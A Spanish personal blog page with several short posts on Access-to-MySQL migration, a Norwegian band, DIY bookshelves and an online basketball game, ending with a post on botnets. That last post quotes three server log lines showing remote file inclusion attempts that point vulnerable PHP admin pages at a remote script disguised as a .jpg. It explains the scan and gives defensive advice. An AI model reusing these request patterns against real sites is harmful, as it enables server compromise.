Migra tus Access a MySQL, muy fácil.

Por necesidades de la vida, y por las limitaciones que tiene el formato Access de Microsoft, me he encontrado con el problema de migrar estos fichero a una base de datos de verdad, como puede ser MySQL.

Una parte esencial es la de desbloquear ciertas tablas ocultas en un fichero mdb. Solo hay que seguir la siguiente guia, donde nos dejan claro que la gente de Access tiene mucho que ocultar 🙂

Please follow and like us:

Hurra Torpedo: Hacer música con electrodomésticos (mas bien basura)

¿Hacer música con basura?. Eso intentan Hurra Torpedo (web oficial). Mas concretamente estos noruegos se especializan en usar electrodomésticos a modo de acompañamiento de una guitarra, reviviendo viejos éxitos poperos de los ’80 (bueno, no tan viejos).
Aparte de dicha caracteristica inusual, los tios visten de manera que en España podiamos llamar “Manolo y compañia” con las manos en la masa, enseñando, o mas bien intuyendo, raja del culo y descamisados como currrantes natos… Y no hablamos de sus pintas. Vamos, dignos de ser vistos en directo.

Según la Wikipedia, no son un grupo en si, se juntan, hacen una gira y desaparecen por un año. Tiene 2 CDs editados que dios sabe donde coño se podrán comprar aunque aseguro que en mas de alguna colección de discos mataria por tener tales joyas.

No me enrrollo mas y os dejo sus videos:

Please follow and like us:

Bricomania: How-To para hacer unas estanterias invisibles para libros

Via LifeHacker, me encuento un sencillo manual de como hacer unas estanterias para tus libros de manera “invisible”. El truco esta en odiar un libro lo suficiente como para sacrificarlo de manera que lo sentenciaremos a ser el apoyo del resto.
Ojo, porque requiere usar una maquina de taladrar, y ganas de perder el tiempo. ¿Tiembla IKEA?.

Please follow and like us:

Cyberdunk, vuelve a ser un vicio…

Desde luego, este juego me ha vuelto a enganchar. Soy jugador, desde hace ya unos meses, y perdí el interes, pero ahora ha vuelto con todo su explendor, al “regalarme” cyberdunk un nuevo jugador que puedo crear desde cero.
Se trata de un simulador de baloncesto online, basado en un interfaz web, y bastante simple, aunque puede llegar a ser un verdadero dolor de cabeza. Hay una burrada de jugadores (dicen en su web que 5,6 millones (imagino entre jugadores controlados por humanos y no humanos), 300 ligas y nada menos que 150 paises.

Tiene una parte de “pago”, para comprar y dirigir equipos, mejorar tu jugador, o hacer equipaciones (que nos daran puntos extra al jugador) personales. Pero el juego en si es 100% gratuito.

La verdad que esta mejorando bastante el juego, ahora hay selecciones, se pueden seguir bastante bien las competiciones tipo copa y demas. Vamos que estoy redescubriendo este jueguecito.

Pasaros por aqui: http://www.cyberdunk.com/ y si me quereis dar unos puntos extra a mi jugador usar este enlace.

Please follow and like us:

Las Bot-Nets esta ahí y son peligrosas

A lo largo del mes pasado, Ricardo Galli (del cual he hablado antes en esta web) ha denunciado la existencia de redes de bot-nets que se comportan como soldados de fortuna, es decir, se alquilan al mejor postor para tirar sitios mediante ataques DDoS, y quien sabe para que mas.

Esto me dejó muy perplejo, ya que va mucho mas allá de lo que yo nunca vi hacer en mis épocas de coqueteos con el mundo “under”. Hay organizaciones, o mejor dicho grupillos, de usuarios que hackean servidores por diversión, para usarlo para alojar warez, y para mas cosas bastante “inofensivas” (que nadie se cabree, pero nunca para joder a nadie). Algunas están muy a la luz, y se dedican a explotar exploits viejos de sistemas o programas para instalar sus propios programas en maquinas remotas o optener acceso. Pero no destruir nada.

A raiz, del famoso ataque a Genbeta y a Galli (tirar de google, ya que encontrareis muchos resumenes), han surgido muchos nombres, y se han destapado mucha basura…

La mayoria de nosotros, pasariamos de largo, ya que nos da un poco igual, pero mi curiosidad ha ido un poco mas allá… Mire unos log de un servidor web. Y me encontré con rastros muy explicativos:

83.172.140.56 – – [29/Feb/2008:12:56:41 +0100] “GET //core/admin/categories_add.php?absoluteurl=http://infectada.net/modules/.jpg?? HTTP/1.1” 404 8318 “-” “libwww-perl/5.65”
83.172.140.56 – – [29/Feb/2008:12:56:42 +0100] “GET /core/admin/admin.php?p=admin&absoluteurl=http://infectada.net/modules/.jpg?? HTTP/1.1” 404 8318 “-” “libwww-perl/5.65”
83.172.140.56 – – [29/Feb/2008:12:56:43 +0100] “GET //core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=http://infectada.net/modules/.jpg?? HTTP/1.1” 404 8318 “-” “libwww-perl/5.65”

Estudiemos que esta ocurriendo, simplemente estamos viendo un intento de escaneo del servidor. La maquina infectada, 83.172.140.56, esta siendo controlada y prueba si es capaz de hacer un RFI, en el servidor. ¿Lo cualo?, vale, mas simple: esa ip, trata de ejecutar el código que contiene la web “infectada.net”, que aunque tiene pinta de ser un jpg, no deja de ser una pieza de codigo PHP, que simplemente testea si se puede hacer el exploit. Si es asi, deja un log para luego atacar la web. El código en cuestión suelen ser derivaciones de un script programado por un tal “Mic22“. Cuando te marcan como infectable, por el mismo método, pueden ejecutar un script que escriba otro código, aun mas malvado, en tu servidor y ser ejecutado simplemente visitando una pagina de tu web.

Es de destacar, que para hacer un RFI, se tienen que dar ciertas condiciones que no son muy normales, como una configuración del PHP, y tener una página con PHP con un codigo que permita ejecutar otro archivo. Pero curiosamente, hay una barbaridad de páginas infectadas.
A cualquiera nos pueden joder, mas aún usando scripts como PHPNuke, WordPress, etc… Resulta mucho mas sencillo infectar sistemas que con el clasico overflow.
Tan sencillo, como que hay varios manuales que explican como hacerlo… si no, aquí uno sencillo.

¿Soluciones?. Manten tus web libres de bugs, actualiza tus scripts (si los usas), usa el .htaccess, y simplemente revisa tus logs. Pero, será dificil lograr no resultar escaneado, ya que sin duda, cada vez es mas sencillo hacer una botnet.

Please follow and like us: